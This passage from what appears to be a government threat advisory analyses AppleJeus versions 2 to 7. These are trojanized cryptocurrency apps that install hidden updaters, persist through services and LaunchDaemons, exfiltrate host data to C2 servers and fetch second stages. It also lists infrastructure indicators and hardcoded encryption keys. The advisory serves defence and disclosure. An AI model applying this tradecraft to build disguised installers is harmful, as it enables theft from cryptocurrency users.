`JMTTrader.exe` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to `CelasTradePro.exe` and the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe program `CrashReporter.exe` is heavily obfuscated with the ADVObfuscation library, renamed \u201csnowman\u201d (_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>)]). When run, it checks for the `Maintain` parameter and collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]). The program also creates a scheduled SYSTEM task, named `JMTCrashReporter`, which runs `CrashReporter.exe` with the `Maintain` parameter at any user\u2019s login (_Scheduled Task/Job: Scheduled Task_ [[T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `JMTTrader` in folder `/Applications/JMTTrader.app/Contents/MacOS/`\n * Installs `.CrashReporter` in folder `/Applications/JMTTrader.app/Contents/Resources/`\n * Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing.\n * Executes a `postinstall` script \n * Moves `.com.jmttrading.plist` to folder `LaunchDaemons`\n * Changes the file permissions on the `plist`\n * Runs `CrashReporter` with the `Maintain` parameter\n * Moves `.CrashReporter` to folder `/Library/JMTTrader/CrashReporter`\n * Makes `.CrashReporter` executable\n\nThe `JMTTrader` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to `CelasTradePro` and the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe `CrashReporter` program checks for the `Maintain` parameter and is not obfuscated. This lack of obfuscation makes it easier to determine the program\u2019s functionality in detail. When it finds the `Maintain` parameter, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\nThe `postinstall` script has similar functionality to the one used by `CelasTradePro`, but it has a few additional features (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It moves the property list (`plist`) file `.com.jmttrading.plis`t from the Installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd _[[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]), but also changes the file permissions on the `plist` file. Once in the folder, this property list (`plist`) file will launch the `CrashReporter` program with the `Maintain` parameter on system load as Root for every user. Also, the `postinstall` script moves the `.CrashReporter` program to a new location `/Library/JMTTrader/CrashReporter` and makes it executable. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `CrashReporter` with the `Maintain` parameter and runs it in the background (_Create or Modify System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nSoon after the cybersecurity company tweeted about JMT Trader on October 11, 2019, the files on GitHub were updated to clean, non-malicious installers. Then on October 13, 2019, a different cybersecurity company published an article detailing the macOS X JMT Trader, and soon after, the C2 `beastgoc[.]com` website went offline. There is not a confirmed sample of the payload to analyze at this point.\n\nFor more details on AppleJeus Version 2: JMT Trading, see [MAR-10322463-2.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048b>).\n\n### AppleJeus Version 3: Union Crypto\n\n#### **Introduction and Infrastructure**\n\nIn December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which was marketed and distributed by a legitimate-looking company, called Union Crypto, on their website, `unioncrypto[.]vip` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). Although this website is no longer available, a cybersecurity researcher discovered a download link, `https://www.unioncrypto[.]vip/download/W6c2dq8By7luMhCmya2v97YeN`, recorded on VirusTotal for the macOS X version of `UnionCryptoTrader`. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim.[[7](<https://securelist.com/operation-applejeus-sequel/95596/>)]\n\nThe `unioncrypto[.]vip` domain resolved to the following IP addresses from June 5, 2019, to July 15, 2020.\n\n * `104.168.167[.]16`\n * `198.54.117[.]197`\n * `198.54.117[.]198`\n * `198.54.117[.]199`\n * `198.54.117[.]200`\n\nThe domain `unioncrypto[.]vip `had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Union Crypto Trader Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious cryptocurrency application is a Windows executable (`.exe`) (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]), which acts as an installer that extracts a temporary MSI Installer.\n\nThe Windows program executes the following actions.\n\n * Extracts `UnionCryptoTrader.msi` to folder `C:\\Users\\<username>\\AppData\\Local\\Temp\\{82E4B719-90F74BD1-9CF1-56CD777E0C42}`\n * Runs `UnionCryptoUpdater.msi`\n * Installs `UnionCryptoTrader.exe` in folder `C:\\Program Files\\UnionCryptoTrader`\n * Installs `UnionCryptoUpdater.exe in folder C:\\Users\\<username>\\AppData\\Local\\UnionCryptoTrader`\n * Deletes `UnionCryptoUpdater.msi`\n * Runs `UnionCryptoUpdater.exe`\n\nThe program `UnionCryptoTrader.exe` loads a legitimate-looking cryptocurrency arbitrage application\u2014defined as \u201cthe simultaneous buying and selling of securities, currency, or commodities in different markets or in derivative forms to take advantage of differing prices for the same asset\u201d\u2014which exhibits no signs of malicious activity. This application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.[[8](<https://github.com/butor/blackbird>)]\n\nThe program `UnionCryptoUpdater.exe` first installs itself as a service (_Create or Modify System Process: Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it \u201cAutomatically installs updates for Union Crypto Trader.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in a string that is MD5 hashed and stored in the `auth_signature` variable before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `UnionCryptoTrader` in folder `/Applications/UnionCryptoTrader.app/Contents/MacOS/`\n * Installs `.unioncryptoupdater` in folder `/Applications/UnionCryptoTrader.app/Contents/Resources/`\n * Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing\n * Executes a `postinstall` script \n * Moves `.vip.unioncrypto.plist` to folder `LaunchDaemons`\n * Changes the file permissions on the `plist` to Root\n * Runs `unioncryptoupdater`\n * Moves `.unioncryptoupdater` to folder `/Library/UnionCrypto/unioncryptoupdater`\n * Makes `.unioncryptoupdater` executable\n\nThe `UnionCryptoTrader` program loads a legitimate-looking cryptocurrency arbitrage application, which exhibits no signs of malicious activity. The application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.\n\nThe `.unioncryptoupdater` program is signed ad-hoc, meaning it is not signed with a valid code-signing identity. When launched, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in a string that is MD5 hashed and stored in the `auth_signature` variable before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\nThe `postinstall` script has similar functionality to the one used by JMT Trading (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It moves the property list (`plist`) file `.vip.unioncrypto.plist` from the Installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]), but also changes the file permissions on the `plist` file to Root. Once in the folder, this property list (`plist`) file will launch the `.unioncryptoupdater` on system load as Root for every user. The `postinstall` script moves the `.unioncryptoupdater` program to a new location `/Library/UnionCrypto/unioncryptoupdater` and makes it executable. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `.unioncryptoupdater` and runs it in the background (_Create or Modify System_ _Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nThe payload for the Windows malware is a Windows Dynamic-Link-Library. `UnionCryptoUpdater.exe` does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware.\n\nThe macOS X malware\u2019s payload could not be downloaded, as the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the macOS X payload. The macOS X payload is likely similar in functionality to the Windows stage 2 detailed above.\n\nFor more details on AppleJeus Version 3: Union Crypto, see [MAR-10322463-3.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048c>).\n\n### Commonalities between Celas Trade Pro, JMT Trading, and Union Crypto\n\n#### **Hardcoded Values**\n\nIn each AppleJeus version, there are hardcoded values used for encryption or to create a signature when combined with the time (table 1).\n\n_Table 1: AppleJeus hardcoded values and uses_\n\n**AppleJeus Version ** | **Value ** | **Use ** \n---|---|--- \n1: Celas Trade Pro | Moz&amp;Wie;#t/6T!2y | XOR encryption to send data \n1: Celas Trade Pro | W29ab@ad%Df324V$Yd | RC4 decryption \n2: JMT Trader Windows | X,%`PMk--Jj8s+6=15:20:11 | XOR encryption to send data \n2: JMT Trader OSX | X,%`PMk--Jj8s+6=\\x02 | XOR encryption to send data \n3: Union Crypto Trader | 12GWAPCT1F0I1S14 | Combined with time for signature \n \nThe Union Crypto Trader and Celas LLC (XOR) values are 16 bytes in length. For JMT Trader, the first 16 bytes of the Windows and macOS X values are identical, and the additional bytes are in a time format for the Windows sample. The structure of a 16-byte value combined with the time is also used in Union Crypto Trader to create the `auth_signature`.\n\nAs mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples.\n\n#### **Open-Source Cryptocurrency Applications**\n\nAll three AppleJeus samples are bundled with modified copies of legitimate cryptocurrency applications and can be used as originally designed to trade cryptocurrency. Both Celas LLC and JMT Trader modified the same cryptocurrency application, Q.T. Bitcoin Trader; Union Crypto Trader modified the Blackbird Bitcoin Arbitrage application.\n\n#### **Postinstall Scripts, Property List Files, and LaunchDaemons**\n\nThe macOS X samples of all three AppleJeus versions contain `postinstall` scripts with similar logic. The Celas LLC `postinstall` script only moves the `plist` file to a new location and launches `Updater` with the `CheckUpdate` parameter in the background. The JMT Trader and Union Crypto Trader also perform these actions and have identical functionality. The additional actions performed by both `postinstall` scripts are to change the file permissions on the `plist`, make a new directory in the `/Library` folder, move `CrashReporter` or `UnionCryptoUpdater` to the newly created folder, and make them executable.\n\nThe `plist` files for all three AppleJeus files have identical functionality. They only differ in the files\u2019 names and one default comment that was not removed from the Celas LLC `plist`. As the logic and functionality of the postinstall scripts and plist files are almost identical, the `LaunchDaemons` created also function the same.\n\nThey will all launch the secondary executable as Root on system load for every user.\n\n### AppleJeus Version 4: Kupay Wallet\n\n#### **Introduction and Infrastructure**\n\nOn March 13, 2020, a new version of the AppleJeus malware was identified. The malware was marketed and distributed by a legitimate-looking company, called Kupay Wallet, on their website `kupaywallet[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]).\n\nThe domain `www.kupaywallet[.]com` resolved to IP address `104.200.67[.]96` from March 20, 2020, to January 16, 2021. CrownCloud US, LLC controlled the IP address (autonomous system number [ASN] 8100), and is located in New York, NY.\n\nThe domain `www.kupaywallet[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Kupay Wallet Application Analysis**\n\n#### _Windows Program_\n\nThe Windows version of the malicious cryptocurrency application is an MSI Installer. The MSI executes the following actions.\n\n * Installs `Kupay.exe` in folder `C:\\Program Files (x86)\\Kupay`\n * Installs `KupayUpgrade.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\KupaySupport`\n * Runs `KupayUpgrade.exe`\n\nThe program `Kupay.exe` loads a legitimate-looking cryptocurrency wallet platform, which exhibits no signs of malicious activity and is very similar to an open-source platform known as Copay, distributed by Atlanta-based company BitPay.\n\nThe program `KupayUpgrade.exe` first installs itself as a service (_Create or Modify System Process:_ _Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon_ _Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it is an \u201cAutomatic Kupay Upgrade.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2_ _Channel_ [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `Kupay` in folder `/Applications/Kupay.app/Contents/MacOS/`\n * Installs `kupay_upgrade` in folder `/Applications/Kupay.app/Contents/MacOS/`\n * Executes a `postinstall` script \n * Creates `KupayDaemon` folder in `/Library/Application Support` folder\n * Moves `kupay_upgrade` to the new folder\n * Moves `com.kupay.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`\n * Runs the command `launchctl load` to load the `plist` without a restart\n * Runs `kupay_upgrade` in the background\n\n`Kupay` is likely a copy of an open-source cryptocurrency wallet application, loads a legitimate-looking wallet program (fully functional), and its functionality is identical to the Windows `Kupay.exe` program.\n\nThe `kupay_upgrade` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named \u201cKupay Wallet 9.0.1 (Check Update Osx)\u201d (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]). If the C2 server returns a file, it is decoded and written to the victim\u2019s folder `/private/tmp/kupay_update` with permissions set by the command `chmod 700` (only the user can read, write, and execute) (_Command and Scripting Interpreter_ [[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). Stage 2 is then launched, and the malware, `kupay_upgrade`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).\n\nThe `postinstall` script has similar functionality to other AppleJeus scripts (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It creates the `KupayDaemon` folder in `/Library/Application` Support folder and then moves `kupay_upgrade` to the new folder. It moves the property list (`plist`) file `com.kupay.pkg.wallet.plist` from the Installer package to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd _[[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). The script runs the command `launchctl load` to load the `plist` without a restart (_Command and Scripting Interpreter _[[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). But, since the LaunchDaemon will not run automatically after the `plist` file is moved, the `postinstall` script launches `kupay_upgrade` and runs it in the background (_Create or Modify System Process: Launch Daemon _[[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nThe Windows malware\u2019s payload could not be downloaded since the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below.\n\nThe stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc.\n\nFor more details on AppleJeus Version 4: Kupay Wallet, see [MAR-10322463-4.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048d>).\n\n### AppleJeus Version 5: CoinGoTrade\n\n#### **Introduction and Infrastructure**\n\nIn early 2020, another version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called CoinGoTrade on their website `coingotrade[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]).\n\nThe domain `CoinGoTrade[.]com` resolved to IP address `198.54.114[.]175` from February 28, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for `Dorusio[.]com` and `Ants2Whale[.]com`.\n\nThe domain `CoinGoTrade[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **CoinGoTrade Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and will execute the following actions.\n\n * Installs `CoinGoTrade.exe` in folder `C:\\Program Files (x86)\\CoinGoTrade`\n * Installs `CoinGoTradeUpdate.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\CoinGoTradeSupport`\n * Runs `CoinGoTradeUpdate.exe`\n\n`CoinGoTrade.exe` loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.\n\n`CoinGoTradeUpdate.exe` first installs itself as a service (_Create or Modify System Process: Windows Service _[[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution _[[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it is an \u201cAutomatic CoinGoTrade Upgrade.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2_ _Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `CoinGoTrade` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`\n * Installs `CoinGoTradeUpgradeDaemon` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`\n * Executes a `postinstall` script \n * Creates `CoinGoTradeService` folder in `/Library/Application Support` folder\n * Moves `CoinGoTradeUpgradeDaemon` to the new folder\n * Moves `com.coingotrade.pkg.product.plist` to folder `/Library/LaunchDaemons/`\n * Runs `CoinGoTradeUpgradeDaemon` in the background\n\nThe `CoinGoTrade` program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program).\n\nThe `CoinGoTradeUpgradeDaemon` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named \u201cCoinGoTrade 1.0 (Check Update Osx)\u201d (_Application Layer Protocol: Web Protocols_ [[T1071.001]](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)). If the C2 server returns a file, it is decoded and written to the victim\u2019s folder `/private/tmp/updatecoingotrade` with permissions set by the command `chmod 700` (only the user can read, write, and execute) (_Command and_ _Scripting Interpreter _[[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). Stage 2 is then launched, and the malware, `CoinGoTradeUpgradeDaemon`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).\n\nThe `postinstall` script has similar functionality to the other scripts (_Command and Scripting Interpreter: Unix Shell _[[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]) and installs `CoinGoTrade` and `CoinGoTradeUpgradeDaemon` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`. It moves the property list (plist) file `com.coingotrade.pkg.product.plist` to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd _[[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `CoinGoTradeUpgradeDaemon` and runs it in the background (_Create or Modify_ _System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nThe Windows malware\u2019s payload could not be downloaded because the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below.\n\nThe stage 2 payload for the macOS X malware was no longer available from the specified download URL. Still, a file was submitted to VirusTotal by the same user on the same date as the macOS X `CoinGoTradeUpgradeDaemon`. These clues suggest that the submitted file may be related to the macOS X version of the malware and the downloaded payload.\n\nThe file `prtspool` is a 64-bit Mach-O executable with a large variety of features that have all been confirmed as functionality. The file has three C2 URLs hardcoded into the file and communicates to these with HTTP POST multipart-form data boundary string. Like other HIDDEN COBRA malware, `prtspool` uses format strings to store data collected about the system and sends it to the C2s.\n\nFor more details on AppleJeus Version 5: CoinGoTrade, see [MAR-10322463-5.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048e>).\n\n### AppleJeus Version 6: Dorusio\n\n#### **Introduction and Infrastructure**\n\nIn March 2020, an additional version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called Dorusio on their website, `dorusio[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). Researchers collected samples for Windows and macOS X versions of the Dorusio Wallet (_Develop Capabilities: Malware_ [[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). As of at least early 2020, the actual download links result in `404` errors. The download page has release notes with version revisions claiming to start with version 1.0.0, released on April 15, 2019.\n\nThe domain dorusio[.]com resolved to IP address `198.54.115[.]51` from March 30, 2020 to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for `CoinGoTrade[.]com` and `Ants2Whale[.]com.`\n\nThe domain `dorusio[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Dorusio Application Analysis**\n\n#### _**Windows Program**_\n\nThe Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and will install the following two programs.\n\n * Installs `Dorusio.exe` in folder `C:\\Program Files (x86)\\Dorusio`\n * Installs `DorusioUpgrade.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\DorusioSupport`\n * Runs `DorusioUpgrade.exe`\n\nThe program, `Dorusio.exe`, loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.\n\nThe program `DorusioUpgrade.exe` first installs itself as a service (_Create or Modify System Process:_ _Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it \u201cAutomatic Dorusio Upgrade.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### _**macOS X Program**_\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `Dorusio` in folder `/Applications/Dorusio.app/Contents/MacOS/`\n * Installs `Dorusio_upgrade` in folder `/Applications/Dorusio.app/Contents/MacOS/`\n * Executes a `postinstall` script \n * Creates `DorusioDaemon` folder in `/Library/Application Support` folder\n * Moves `Dorusio_upgrade` to the new folder\n * Moves `com.dorusio.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`\n * Runs `Dorusio_upgrade` in the background\n\nThe `Dorusio` program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking wallet program (fully functional). Aside from the Dorusio logo and two new services, the wallet appears to be the same as the Kupay Wallet. This application seems to be a modification of the open-source cryptocurrency wallet Copay distributed by Atlanta-based company BitPay.\n\nThe `Dorusio_upgrade` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named \u201c_Dorusio Wallet 2.1.0 (Check Update Osx)_\u201d (_Application Layer Protocol: Web Protocols_ [[T1071.001]](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)). If the C2 server returns a file, it is decoded and written to the victim\u2019s folder `/private/tmp/Dorusio_update` with permissions set by the command `chmod 700` (only the user can read, write, and execute) (_Command and Scripting Interpreter _[[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). Stage 2 is then launched, and the malware, `Dorusio_upgrade`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).\n\nThe `postinstall` script has similar functionality to other AppleJeus scripts (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It creates the `DorusioDaemon` folder in `/Library/Application Support` folder and then moves `Dorusio_upgrade` to the new folder. It moves the property list (`plist`) file `com.dorusio.pkg.wallet.plist` from the Installer package to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd _[[T1053.004]](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)). Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `Dorusio_upgrade` and runs it in the background (_Create or Modify System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### _**Payload**_\n\nNeither the payload for the Windows nor macOS X malware could be downloaded; the C2 server is no longer accessible. The payloads are likely similar in functionality to the macOS X stage 2 from CoinGoTrade and Kupay Wallet, or the Windows stage 2 from Union Crypto.\n\nFor more details on AppleJeus Version 6: Dorusio, see [MAR-10322463-6.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048f>).\n\n### AppleJeus 4, 5, and 6 Installation Conflictions\n\nIf a user attempts to install the Kupay Wallet, CoinGoTrade, and Dorusio applications on the same system, they will encounter installation conflicts.\n\nIf Kupay Wallet is already installed on a system and the user tries to install CoinGoTrade or Dorusio:\n\n * Pop-up windows appear, stating a more recent version of the program is already installed.\n\nIf CoinGoTrade is already installed on a system and the user attempts to install Kupay Wallet:\n\n * `Kupay.exe` will be installed in the `C:\\Program Files (x86)\\CoinGoTrade\\ folder`.\n * All `CoinGoTrade` files will be deleted.\n * The folders and files contained in the `C:\\Users\\<username>\\AppData\\Roaming\\CoinGoTradeSupport` will remain installed.\n * `KupayUpgrade.exe` is installed in the new folder `C:\\Users\\<username>\\AppData\\Roaming\\KupaySupport`.\n\nIf Dorusio is already installed on a system and the user attempts to install Kupay Wallet:\n\n * `Kupay.exe` will be installed in the `C:\\Program Files (x86)\\Dorusio\\ folder`.\n * All `Dorusio.exe` files will be deleted.\n * The folders and files contained in `C:\\Users\\<username>\\AppData\\Roaming\\DorusioSupport` will remain installed.\n * `KupayUpgrade.exe` is installed in the new folder `C:\\Users\\<username>\\AppData\\Roaming\\KupaySupport`.\n\n### AppleJeus Version 7: Ants2Whale\n\n#### **Introduction and Infrastructure**\n\nIn late 2020, a new version of AppleJeus was identified called \u201cAnts2Whale.\u201d The site for this version of AppleJeus is `ants2whale[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). The website shows a legitimate-looking cryptocurrency company and application. The website contains multiple spelling and grammar mistakes indicating the creator may not have English as a first language. The website states that to download Ants2Whale, a user must contact the administrator, as their product is a \u201cpremium package\u201d (_Develop Capabilities: Malware_ 